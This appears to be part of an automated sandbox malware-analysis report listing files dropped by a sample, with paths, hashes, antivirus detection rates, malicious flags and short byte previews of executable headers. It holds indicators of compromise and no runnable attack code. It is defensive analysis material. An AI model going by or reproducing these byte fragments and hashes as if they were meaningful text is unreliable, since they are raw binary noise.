                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a....}...}...}B.}...}...}..}..}y..}..}..}.`t}...}...}4..}..}...}...}...}...}...}Rich...}................PE..L.....`.........................................@.................................gV..........................................(.......P...........................@...............................8...@............................................text............................... ..`.data...............................@....rsrc...P...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\dll[1]

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):242176
                                                                                                                          Entropy (8bit):6.47050397947197
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                                                                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                                                                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                                                                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                                                                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):14734
                                                                                                                          Entropy (8bit):4.996142136926143
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:SEdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:SYV3IpNBQkj2Yh4iUxZvuiOOdBCNZlYO
                                                                                                                          MD5:B7D3A4EB1F0AED131A6E0EDF1D3C0414
                                                                                                                          SHA1:A72E0DDE5F3083632B7242D2407658BCA3E54F29
                                                                                                                          SHA-256:8E0EB5898DDF86FE9FE0011DD7AC6711BB0639A8707053D831FB348F9658289B
                                                                                                                          SHA-512:F9367BBEC9A44E5C08757576C56B9C8637D8A0A9D6220DE925255888E6A0A088C653E207E211A6796F6A7F469736D538EA5B9E094944316CF4E8189DDD3EED9D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):22340
                                                                                                                          Entropy (8bit):5.604296486949307
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:EtFob0mNr5Hl3ep4Kn5joklPItx9gUS43QGTlGMZ7ZlbxV7IWWqsdDI+1za:l9Hq4K5NlPugUvrl5xfb2Zq
                                                                                                                          MD5:5228C9B72BBBAB2EE2B498BD80F7CB08
                                                                                                                          SHA1:ABED0D048EC3480E6190814FA506AACCB3CF40DC
                                                                                                                          SHA-256:DA4D8638E53A6A39942831D3A593731DB810C3C9F07B82CF77B1CEDDA65C0002
                                                                                                                          SHA-512:1210A472AECA997E5072BB8F52BD398A13BA39477B7096A7E41EC0EDB5BD06E2E97C48ED65DE1BD043A68F7EABEB738B93D27E0BEB544FA7934C6FF6D4F39D25
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:@...e...................e.[...........X...F..........@..........H...............<@.^.L."My...:O..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                                          C:\Users\user\AppData\Local\Temp\4fuajV8AhoqLy5RrTppLX0CdLvwBLgSTA5z2y

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):73728
                                                                                                                          Entropy (8bit):1.1874185457069584
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                          MD5:72A43D390E478BA9664F03951692D109
                                                                                                                          SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                          SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                          SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):331264
                                                                                                                          Entropy (8bit):7.2248343132550055
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:q/bWaflIBqb1QB/SGE2NkMOVsLuc0MollllQFFFU4fG:dkl6qb1QQGE2N1w0s
                                                                                                                          MD5:C700E917DD024B491793800D89E88F92
                                                                                                                          SHA1:A8F0F54C960200497099A20B9BF84F83F490DAC0
                                                                                                                          SHA-256:F8088E79EDE60486EED5025B16283D26BA2EE2557CDFAE3A8D526DA95425388F
                                                                                                                          SHA-512:1C03BE7FE4843C6E817590ECBDD64666AC819CD65C15A5049F64D1FBD11DD71428A4B135DE652082BC07DD14A009851EF8CD0364C5BB87792C6629FCABDD2008
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: Metadefender, Detection: 43%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...;..b.........."......t...........`... ... ....@.. ....................................@.................................l'..O............................@.......................................................`............... ..H.............J.M`(q0.... ......................@....text....p... ...r.................. ..`.rsrc................n..............@..@.reloc.......@......................@..B.............`...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\628292505a6c3_91a0215e.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):10985
                                                                                                                          Entropy (8bit):5.840158358764091
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:TiR/W6lFoFD+bM/Fk6yMyTBejb0P9Q43A9Q4BZ99iP21d6A844pX9Ai6uqL7D:TixFoFDjFk6yMGejb01ege1wA8HW9ZLX
                                                                                                                          MD5:F6B8220192F3D62155253CFB4D3B8E76
                                                                                                                          SHA1:C9986EBAC6348625F9B6E0A18DD333843482ED70
                                                                                                                          SHA-256:95E1E9E86B0AA9225A831C2F2D4CDC4F74154FB3A73126F1488419639405885F
                                                                                                                          SHA-512:F163A4CAF9B2C230971EEAEEDA6B5E9D865FB261A304E16A3718C7ED3E0F4F5B4DD488C8E79F321CC7229B950390560A1AB40C72B71977F94ED51BFCD10C7AD0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<!DOCTYPE html>.<html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Lu9wNhaDxyRaWYGY8ceC4xRgkWgNlcLDpg6XcmoVKzall8kqwzeYkuUpr1pHYoQxMyuN1BranbAJHBCYSEXHNg==" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />. <title>nhsgeehf.xyz</title>..<script src="//www.google.com/adsense/domains/caf.js" type="text/javascript" ></script>..<link href="//d1lxhc4jvstzrp.cloudfront.net/themes/assets/style.css" rel="stylesheet" type="text/css" media="screen" />..<link href="//d1lxhc4jvstzrp.cloudfront.net/themes/regnitz_0f823431/style.css" rel="stylesheet" type="text/css" media="screen" />....</head>..<body id="afd" style="visibility:hidden"><div id="reg-banner" class="reg-banner">. <style>. .reg-banner {. box-sizing:b

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):315392
                                                                                                                          Entropy (8bit):6.319536320257364
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:ULwpEFWtfJqN4ACGWkDQoYshnGMApM9LXY4EPf:NqN4ACGWCQmGMApM9TREPf
                                                                                                                          MD5:171F2967683A3DF041312E473FA664E5
                                                                                                                          SHA1:2E13F7C9199EBD26A32AE692117851E21F03C20C
                                                                                                                          SHA-256:9C7D107F95392A768573BE4EE28EE5D4EAD9DBF13938D4AD42EE7839BF214523
                                                                                                                          SHA-512:DDDC29FF804DACE3110BFCFBB5EEF3054890906D50D953956EC652EA3A0C71CF389A97D09EB70EF4474788433756ADD91E1128975004BB9C5E1C6D8027920EE4
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Metadefender, Detection: 49%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 84%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.Chv.-;v.-;v.-;..r;}.-;..p;o.-;v.,;j.-;Q5P;o.-;Q5@;..-;Q5C;..-;Q5_;r.-;Q5Q;w.-;Q5U;w.-;Richv.-;................PE..L....T{b................. ...................0....@.................................8v......................................0........p..................................................................@............0..d.......@....................text...,........ .................. ..`.rdata..L....0.......0..............@..@.data....h.......0..................@....rsrc........p.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1854409
                                                                                                                          Entropy (8bit):7.501469079102821
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:t4nXubIQGyxbPV0db26W/7qKndoQcIDsv1Et9uGpckT52zedlq89Ws5uIzk5aM/y:tqe3f6+5aQctSffPMWrQ0Zkw
                                                                                                                          MD5:ABA047B6FD3151E4EC49575B507552F4
                                                                                                                          SHA1:B9147046632EB07DCF44AE4530485A18B7EAE726
                                                                                                                          SHA-256:CC3F78F11FB66A18DF6F34C5C0E0C03DE82CB366F270C3BB203119EF6B4E3BCC
                                                                                                                          SHA-512:8E5BCE5AEC1DC2C223963C593C0E18078B0E136D090D1D4901F5557BC51AF01C75BDA3A41EBE1353094BD1DDF5DC02796F9A5132D0D6B3BB3980D851DC374A22
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Metadefender, Detection: 17%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 31%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...'..`.................P...\.......^.......p....@.......................................@......@...................@....... ..6....p.......................................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc........p......................@..@....................................@..@........................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):304640
                                                                                                                          Entropy (8bit):4.771339685226154
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:MFSNNqcgccJkoXE0H/88hqooxPiFVjTpmjnNdZjWdsxkgaBChUpZa9uD6Vdyhkd:oxccJLXE0H/3hj4stEjN3WCiga3wVfd
                                                                                                                          MD5:20F7806A7719B1F94B8B4756F786CE36
                                                                                                                          SHA1:308424288B9EFFD4CAFC3BBBB9BE466F56E65FE1
                                                                                                                          SHA-256:1B835CCF03B4AAFF3C73E02E4A0A2F01C41556B04A42C9CDC30C1FE540AA9531
                                                                                                                          SHA-512:20BD0C1DFF209E6EB0D43121862DDE932EDD45287AD17145F0913A9BFCF0B435A72E5531D2CF39CD906D1AB07B054E32982492859C252C5D16A1A6006FC3DD71
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|..F...F...F...)kR.Y...)kg.]...)kS.0...Oej.M...F...>...)kV.G...)kc.G...)kd.G...RichF...........................PE..L....X`......................t......X............@...........................v.............................................t...x.....u...................... v.T...................................@5..@............................................text...P........................... ..`.data...P.r.........................@....liwef......@t.....................@..@.suvaronp.....t......*..............@..@.disexim......t.....................@..@.dakev........t......0..............@..`.rsrc.........u......4..............@..@.reloc...]... v..^...H..............@..B................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2120699
                                                                                                                          Entropy (8bit):6.665923125449561
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:gJr8tE+gHqU0GupFyrMfpS0KX1ZOcI7/2IDXzas5lqO8VTm:gJ4NP/ywjK7E2Uas5lqnVS
                                                                                                                          MD5:0F0FA21EC39133BFA480B0CF3DFCED00
                                                                                                                          SHA1:386C870036865D86274E221857D782DE320CA2D4
                                                                                                                          SHA-256:A0A6E969AC0CC635D705EC7CEEBCAD2960236C35DB0138A89A74B2EC3CFBC47F
                                                                                                                          SHA-512:90890DCDA4A4AB0C82ABDE03A5B7E82F6B51BB01A8516A39A18C954343372682D33B73AECA96A805381F3FC5D0056A3C4404637D8023AC1829631E25442C26D9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........NB. .. .. .S6... .S6..j. .S6.... .F.... .F.$... .F.#.. .F.%.. ..... ..... ..!.. ...%... ... .. ...... ...".. .Rich. .................PE..L..... b.................b.......... B............@.......................................@.........................0...4...d...P...............................x(......T...............................@...............,............................text....a.......b.................. ..`.rdata..............f..............@..@.data...`]...0......................@....didat..`...........................@....rsrc...............................@..@.reloc..x(.......*..................@..B........................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):424448
                                                                                                                          Entropy (8bit):5.963947295543498
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:/eGMADeeyE0HUOYZMlSQqYLgEULIAYAMU/Jz+Ixtiga3wVfd:mGMADeeyE0HUQgEyYFU/FxQe
                                                                                                                          MD5:5E90B6DD2E1A6B5154E89AB7A9274E4F
                                                                                                                          SHA1:B62ADC0787FEA8AD70BD86FE682085E9663BDFD8
                                                                                                                          SHA-256:D5C1DBCFCA85E292E2BD9BAA50EEFF514DEA7D8635DB4DAD6041053605AD284D
                                                                                                                          SHA-512:40F93A9C20AC9B5DA1FD93AA31D2EA00B0A0C8C0D0F17732101B232E3E1468D5D3FC920AC9122CD81D31FBF8607F98D0174FF44E1E023064C24B8EE5CAA066FC
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|..F...F...F...)kR.Y...)kg.]...)kS.0...Oej.M...F...>...)kV.G...)kc.G...)kd.G...RichF...........................PE..L.....0`.................n....t......X............@..........................Px......Y.......................................s..x.....v.......................w.H............................5......@5..@............................................text....l.......n.................. ..`.data...P.r..........r..............@....gopakep.....v......|..............@..@.mocede.p.....v.....................@..@.zot..........v.....................@..@.roxa.........v.....................@..`.rsrc.........v.....................@..@.reloc...]....w..^..................@..B................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3684352
                                                                                                                          Entropy (8bit):7.796012943583518
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:2ZsHtc/ALmosj4lhot91vCeJTPteci9nGcH:WsH6oLlsj4lhoP1vCeecRc
                                                                                                                          MD5:0D8ED2ABED9402D2B69501CFC536FB2C
                                                                                                                          SHA1:6521A1B62B9A81965EF860ADAA443D8D618FE227
                                                                                                                          SHA-256:1A3E8E6966C6F3DDD98C38B8FA5AB71A1BFCA8D8DE2026ACB1A584BF1C6D9293
                                                                                                                          SHA-512:8A5F157FDFD42A50C9AE9691236FB47A5D5DA9817CBAAFA07C83A76CF98605E0D5BF42F1C32B93C261E8FF14868F0183A28400DB84F185DA1CCA466617B5E164
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....).b..........#.................dG+........@..............................a........... ...................................................=.......a.....P.a..............................................,?.0.....a.8............@*..............................text...P........................... ..`.rdata...O..........................@..@.data...............................@....pdata..|...........................@..@_RDATA.......0......................@..@.vmp0...E....@......................`..`.vmp1....08..`)..28.................`..h.rsrc.........a......68.............@..@................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925b8abce_97dd7946.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):304640
                                                                                                                          Entropy (8bit):4.772367981902024
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:fFSNV6pgcV/JkATLC2lgAxUqJq7uLNaWSih5sxkgaBChUpZa9uD6Vdyhkw:dachJDTLXSGZQ7AjSih+iga3wVfw
                                                                                                                          MD5:0F0374F878D4ADBE3212DE6C642AD179
                                                                                                                          SHA1:BD3922131D6CC550318F090B3A1DBF01E3CF91CF
                                                                                                                          SHA-256:EB91AB1FAE5CF062BAA8D2538092BA8B02ADBA60982FF39C126C297F09C154E8
                                                                                                                          SHA-512:B00C6C8BD160AD91C0D7C138BF7EB5290D074AD464FE6BDD84DFA68F5EE460BBF161CEDD4025B19AE4596F7050C3CA5D7BF3AAF03EEC15DC4FDF811F2841A964
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|..F...F...F...)kR.Y...)kg.]...)kS.0...Oej.M...F...>...)kV.G...)kc.G...)kd.G...RichF...........................PE..L......`......................t......X............@...........................v.....2...........................................x.....u...................... v.T...................................@5..@............................................text............................... ..`.data...P.r.........................@....piyox......@t.....................@..@.none...p.....t......*..............@..@.lurad........t.....................@..@.poriga.......t......0..............@..`.rsrc.........u......4..............@..@.reloc...]... v..^...H..............@..B................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925c504be_44b654a9fe.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):378880
                                                                                                                          Entropy (8bit):5.607191631418201
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:dov8OH0E0He/PlWbOIkJO1qBrwk/XB2/6siga3wVfd:yv8OH0E0He/YyIdkvBLpe
                                                                                                                          MD5:157B2A59AC5BC85091675C965F4318FD
                                                                                                                          SHA1:EB3AF164EEA32BBF660948EF88FFEA942C6A7A15
                                                                                                                          SHA-256:7A3E975883121971780AA9DD7D8DB8EAEC246182258D0A7FA288F72D29A81672
                                                                                                                          SHA-512:467B9EC3A8217B5F57ABF07E9C24DDB6746833A56A4CC7BE07F9D573B34A6398DF850554DD223591D0DB54F64A119ED3603BA815B041C921123E6CEA89A73F55
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|..F...F...F...)kR.Y...)kg.]...)kS.0...Oej.M...F...>...)kV.G...)kc.G...)kd.G...RichF...........................PE..L...e`.`......................t......X............@...........................w.....1...........................................x.... v......................@w.T...................................@5..@............................................text.............................. ..`.data...P.r.........................@....tecokez....`u.....................@..@.cox....p.....u......L..............@..@.zafilol......v......P..............@..@.mejakeb......v......R..............@..`.rsrc........ v......V..............@..@.reloc...]...@w..^...j..............@..B................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925d5ee10_0da12a.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):770264
                                                                                                                          Entropy (8bit):5.873889730334173
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:VQi3IG+zy2dc6m6UR0Izup1hf39Wkv8xwJA:VQiYG+zy2dzHIzupdUMA
                                                                                                                          MD5:5AD462630A7EFCB7E44DB91AB95A82B2
                                                                                                                          SHA1:ECC153E816CC080EB3B54E7382CE874F7057AD03
                                                                                                                          SHA-256:E20D43476B4E110016CC0E155447E6B3DC6ECC02FE7C44FA42F0D6E9E036079E
                                                                                                                          SHA-512:DAB9647A07034A1D548080A8E3D13A852B20EA5AE9B5AB713B0C209790C7298CBE42F5B225C910352F35A03AAEEE02FC6C07E60BAD48463C0E5BE9942F48CB4A
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@.......................................@......@..............................P.......(...........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...(...........................@..P.............@......................@..P........................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ea53e7_da60dc03.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1494016
                                                                                                                          Entropy (8bit):7.965987770220577
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:aJgGR4VpyqHnDnGI0PdQANMhX1muTs7gnUluUEMk4q7K+Tq5HtF3:DGajjnJ0PdQPhX1bTmuPM+Tq5Nl
                                                                                                                          MD5:3480E8251E7CA5D00BA55DE5E44FFBA2
                                                                                                                          SHA1:8C338C0D5BB682C23B6BE892B687D01675DEB6CB
                                                                                                                          SHA-256:CFE1D19AB44906E23F4E83AA76F98D6526FF8C2C8021951565C98260D3E97480
                                                                                                                          SHA-512:11222188E8626E6C88EDFC510603C8BB759D6A8E606DDAD50CAB5BC19AEB2EEC9307FA5B294CC82F33D90736D264843940D4F26D10A6D462CCF4B71FDC187FC6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L..... b.................@...n........;......P....@...........................;...............................................;...... ;..h....................................................;.......................;.h............................MPRESS1..;......Z.......................MPRESS2......;......\...................rsrc....h... ;..h...d..............@..............................................................................v2.19...X..r.......d...d.q.d.r.dG.Z..."/.n.y....+..T.^M.O..x..w_...i&v,#B....x4...Kw.b.....D........M..k.M..s8.`$..U.....u..#-.~...8up........L3.._a..T...e..}..B.G.v..}..70.cs...M. ......V[.+..........Fr.i18...z.....'.R..p3....);^....k|..jj9AkS.`.a%.u.JD..j*j.V.=&...,O..U0=....).......Q.W........1 .....Ql.......J.h...F?.b.J...J....>vi..... ....y ..p.8.|\Q..[..].=u...:d.mo<...d.A.....g..7b$%.....B....h.O..\..NX.....R..+...ru.9......t....q..X......Zk..t....0.^[b.......)....

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\libgcc_s_dw2-1.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
